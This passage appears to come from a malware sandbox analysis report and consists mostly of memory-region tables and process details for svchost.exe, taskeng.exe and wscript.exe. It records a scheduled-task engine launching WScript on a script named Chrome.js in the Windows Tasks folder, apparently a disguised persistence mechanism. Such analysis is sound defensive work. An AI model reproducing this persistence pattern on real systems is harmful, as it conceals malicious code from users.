| private_0x0000000001520000 | 0x01520000 | 0x0159ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000015a0000 | 0x015a0000 | 0x0161ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001620000 | 0x01620000 | 0x0169ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016e0000 | 0x016e0000 | 0x0175ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001760000 | 0x01760000 | 0x017dffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001810000 | 0x01810000 | 0x0188ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001890000 | 0x01890000 | 0x0190ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001940000 | 0x01940000 | 0x019bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000019e0000 | 0x019e0000 | 0x01a5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001a60000 | 0x01a60000 | 0x01adffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b00000 | 0x01b00000 | 0x01b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001b90000 | 0x01b90000 | 0x01c0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001c60000 | 0x01c60000 | 0x01cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e20000 | 0x01e20000 | 0x01e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ea0000 | 0x01ea0000 | 0x01f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0201ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002020000 | 0x02020000 | 0x02362fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002370000 | 0x02370000 | 0x0246ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002550000 | 0x02550000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x026affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002770000 | 0x02770000 | 0x027effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002810000 | 0x02810000 | 0x0288ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028e0000 | 0x028e0000 | 0x0295ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002960000 | 0x02960000 | 0x02a5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002bd0000 | 0x02bd0000 | 0x02c4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02d4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002dd0000 | 0x02dd0000 | 0x02ecffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f20000 | 0x02f20000 | 0x02f2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002f80000 | 0x02f80000 | 0x02f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x0309ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030a0000 | 0x030a0000 | 0x0311ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x031cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x032cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032d0000 | 0x032d0000 | 0x0334ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003350000 | 0x03350000 | 0x033cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000033e0000 | 0x033e0000 | 0x0345ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003460000 | 0x03460000 | 0x0355ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003590000 | 0x03590000 | 0x0360ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003630000 | 0x03630000 | 0x036affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037c0000 | 0x037c0000 | 0x0383ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x0390ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003a20000 | 0x03a20000 | 0x03b1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b80000 | 0x03b80000 | 0x03bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c60000 | 0x03c60000 | 0x03cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003ce0000 | 0x03ce0000 | 0x03edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f10000 | 0x03f10000 | 0x03f8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003f90000 | 0x03f90000 | 0x0400ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004020000 | 0x04020000 | 0x0409ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000040b0000 | 0x040b0000 | 0x0412ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004190000 | 0x04190000 | 0x0420ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004290000 | 0x04290000 | 0x0430ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044c0000 | 0x044c0000 | 0x0453ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x0473ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000047b0000 | 0x047b0000 | 0x0482ffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| svchost.exe | 0xffc20000 | 0xffc2afff | Memory Mapped File | rwx |
|
|
|
- |
| qmgr.dll | 0x7fee30d0000 | 0x7fee31a1fff | Memory Mapped File | rwx |
|
|
|
- |
| tcpipcfg.dll | 0x7fef35d0000 | 0x7fef3611fff | Memory Mapped File | rwx |
|
|
|
- |
| mprapi.dll | 0x7fef4dd0000 | 0x7fef4e09fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7fef59c0000 | 0x7fef59cbfff | Memory Mapped File | rwx |
|
|
|
- |
| wbemess.dll | 0x7fef5b20000 | 0x7fef5b9dfff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7fef5ba0000 | 0x7fef5bb5fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiprvsd.dll | 0x7fef5bc0000 | 0x7fef5c7bfff | Memory Mapped File | rwx |
|
|
|
- |
| repdrvfs.dll | 0x7fef5c80000 | 0x7fef5cf2fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7fef5d00000 | 0x7fef5d25fff | Memory Mapped File | rwx |
|
|
|
- |
| hnetcfg.dll | 0x7fef5d30000 | 0x7fef5d9afff | Memory Mapped File | rwx |
|
|
|
- |
| resutils.dll | 0x7fef5da0000 | 0x7fef5db8fff | Memory Mapped File | rwx |
|
|
|
- |
| clusapi.dll | 0x7fef5dc0000 | 0x7fef5e0ffff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7fef5e10000 | 0x7fef5e23fff | Memory Mapped File | rwx |
|
|
|
- |
| esscli.dll | 0x7fef5e30000 | 0x7fef5e9efff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcore.dll | 0x7fef5ea0000 | 0x7fef5fcefff | Memory Mapped File | rwx |
|
|
|
- |
| nci.dll | 0x7fef5fd0000 | 0x7fef5fe9fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7fef5ff0000 | 0x7fef6063fff | Memory Mapped File | rwx |
|
|
|
- |
| netcfgx.dll | 0x7fef6070000 | 0x7fef60f3fff | Memory Mapped File | rwx |
|
|
|
- |
| browser.dll | 0x7fef6300000 | 0x7fef6324fff | Memory Mapped File | rwx |
|
|
|
- |
| srvsvc.dll | 0x7fef6330000 | 0x7fef636cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdsapi.dll | 0x7fef6370000 | 0x7fef6396fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7fef63a0000 | 0x7fef6481fff | Memory Mapped File | rwx |
|
|
|
- |
| wdscore.dll | 0x7fef64d0000 | 0x7fef6516fff | Memory Mapped File | rwx |
|
|
|
- |
| sqmapi.dll | 0x7fef6520000 | 0x7fef6561fff | Memory Mapped File | rwx |
|
|
|
- |
| rtutils.dll | 0x7fef6570000 | 0x7fef6580fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpsvc.dll | 0x7fef6590000 | 0x7fef6621fff | Memory Mapped File | rwx |
|
|
|
- |
| vsstrace.dll | 0x7fef73c0000 | 0x7fef73d6fff | Memory Mapped File | rwx |
|
|
|
- |
| vssapi.dll | 0x7fef73e0000 | 0x7fef758ffff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7fef8120000 | 0x7fef8128fff | Memory Mapped File | rwx |
|
|
|
- |
| rascfg.dll | 0x7fef8940000 | 0x7fef8959fff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7fef8f60000 | 0x7fef904dfff | Memory Mapped File | rwx |
|
|
|
- |
| ndiscapcfg.dll | 0x7fef9340000 | 0x7fef934efff | Memory Mapped File | rwx |
|
|
|
- |
| ncprov.dll | 0x7fef9350000 | 0x7fef9365fff | Memory Mapped File | rwx |
|
|
|
- |
| taskcomp.dll | 0x7fef93c0000 | 0x7fef9436fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fef9440000 | 0x7fef9449fff | Memory Mapped File | rwx |
|
|
|
- |
| schedsvc.dll | 0x7fef9450000 | 0x7fef9561fff | Memory Mapped File | rwx |
|
|
|
- |
| wiarpc.dll | 0x7fef9570000 | 0x7fef957efff | Memory Mapped File | rwx |
|
|
|
- |
| fvecerts.dll | 0x7fef9580000 | 0x7fef9588fff | Memory Mapped File | rwx |
|
|
|
- |
| tbs.dll | 0x7fef9590000 | 0x7fef9598fff | Memory Mapped File | rwx |
|
|
|
- |
| fveapi.dll | 0x7fef95a0000 | 0x7fef95f5fff | Memory Mapped File | rwx |
|
|
|
- |
| shsvcs.dll | 0x7fef9600000 | 0x7fef965dfff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7fef9660000 | 0x7fef9677fff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc6.dll | 0x7fef9680000 | 0x7fef9690fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7fef96b0000 | 0x7fef9702fff | Memory Mapped File | rwx |
|
|
|
- |
| sens.dll | 0x7fefb650000 | 0x7fefb663fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7fefb670000 | 0x7fefb67afff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 212 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #8: taskeng.exe
0
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\windows\system32\taskeng.exe |
| Command Line | taskeng.exe {AE294675-9745-492B-BE4E-812B04D502A6} S-1-5-21-2345716840-1148442690-1481144037-1000:YKYD69Q\aETAdzjz:Interactive:LUA[1] |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:15, Reason: Child Process |
| Unmonitor | End Time: 00:04:44, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:29 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x850 |
| Parent PID | 0x36c (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
854
0x
86C
0x
83C
0x
880
0x
87C
0x
878
0x
8A4
0x
8B4
0x
418
0x
8C4
0x
978
0x
AB4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00051fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0007ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x00090fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x0022ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00230000 | 0x00296fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003a0000 | 0x003a0000 | 0x00527fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x006b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x01abffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ac0000 | 0x01ac0000 | 0x01eb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001ec0000 | 0x01ec0000 | 0x01f9efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fb0000 | 0x01fb0000 | 0x0202ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002030000 | 0x02030000 | 0x020affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000020b0000 | 0x020b0000 | 0x020b1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x0218ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x0221ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0231ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x0244ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02450000 | 0x0271efff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000027d0000 | 0x027d0000 | 0x0284ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002910000 | 0x02910000 | 0x0298ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a00000 | 0x02a00000 | 0x02a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ab0000 | 0x02ab0000 | 0x02b2ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b40000 | 0x02b40000 | 0x02bbffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| taskeng.exe | 0xff2b0000 | 0xff323fff | Memory Mapped File | rwx |
|
|
|
- |
| tschannel.dll | 0x7fef8120000 | 0x7fef8128fff | Memory Mapped File | rwx |
|
|
|
- |
| ktmw32.dll | 0x7fef9440000 | 0x7fef9449fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7fefc040000 | 0x7fefc074fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7fefc080000 | 0x7fefc097fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| wevtapi.dll | 0x7fefd6b0000 | 0x7fefd71cfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7fefda50000 | 0x7fefda74fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x7fefdb70000 | 0x7fefdb83fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffaa000 | 0x7fffffaa000 | 0x7fffffabfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Process #14: wscript.exe
114
0
| Information | Value |
|---|---|
| ID | #14 |
| File Name | c:\windows\system32\wscript.exe |
| Command Line | C:\Windows\System32\WScript.exe "C:\Windows\Tasks\Chrome.js" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:30, Reason: Child Process |
| Unmonitor | End Time: 00:03:17, Reason: Self Terminated |
| Monitor Duration | 00:00:47 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8dc |
| Parent PID | 0x850 (c:\windows\system32\taskeng.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
844
0x
840
0x
15C
0x
48C
0x
374
0x
96C
0x
974
0x
B0
0x
1C8
0x
34C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00026fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00041fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00170000 | 0x001d6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x002e0000 | 0x002e5fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x00577fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00580fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00590fff | Pagefile Backed Memory | r |
|
|
|
- |
| chrome.js | 0x005a0000 | 0x005a0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005affff | Private Memory | rw |
|
|
|
- |
| chrome.js | 0x005b0000 | 0x005b0fff | Memory Mapped File | r |
|
|
|
- |
| wshom.ocx | 0x005b0000 | 0x005c3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00760fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x01b6ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001b70000 | 0x01b70000 | 0x01eb2fff | Pagefile Backed Memory | r |
|
|
|
- |
| rpcss.dll | 0x01ec0000 | 0x01f3cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001ec0000 | 0x01ec0000 | 0x0201ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001ec0000 | 0x01ec0000 | 0x01f9efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0201ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002020000 | 0x02020000 | 0x02020fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000002030000 | 0x02030000 | 0x02031fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002040000 | 0x02040000 | 0x0213ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x02140000 | 0x02184fff | Memory Mapped File | r |
|
|
|
- |
| oleaccrc.dll | 0x02140000 | 0x02140fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002150000 | 0x02150000 | 0x02151fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002160000 | 0x02160000 | 0x02161fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x02170000 | 0x02173fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db | 0x02180000 | 0x0219ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x022a0000 | 0x0256efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002570000 | 0x02570000 | 0x02570fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x02580000 | 0x025affff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000025b0000 | 0x025b0000 | 0x026affff | Private Memory | rw |
|
|
|
- |
| cversions.2.db | 0x026b0000 | 0x026b3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000026c0000 | 0x026c0000 | 0x026c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000026d0000 | 0x026d0000 | 0x027cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000027d0000 | 0x027d0000 | 0x037cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000037d0000 | 0x037d0000 | 0x0397ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000037d0000 | 0x037d0000 | 0x038cffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x038d0000 | 0x03935fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000003970000 | 0x03970000 | 0x0397ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003980000 | 0x03980000 | 0x03a7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003b20000 | 0x03b20000 | 0x03c1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d20000 | 0x03d20000 | 0x03e1ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003fd0000 | 0x03fd0000 | 0x040cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000040d0000 | 0x040d0000 | 0x044c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004540000 | 0x04540000 | 0x0463ffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77e00000 | 0x77e06fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| wscript.exe | 0xff6b0000 | 0xff6dbfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fef3500000 | 0x7fef359ffff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x7fef3830000 | 0x7fef3863fff | Memory Mapped File | rwx |
|
|
|
- |
| jscript.dll | 0x7fef38e0000 | 0x7fef39c2fff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x7fef3ed0000 | 0x7fef3f23fff | Memory Mapped File | rwx |
|
|
|
- |
| ieframe.dll | 0x7fef3f30000 | 0x7fef4ae6fff | Memory Mapped File | rwx |
|
|
|
- |
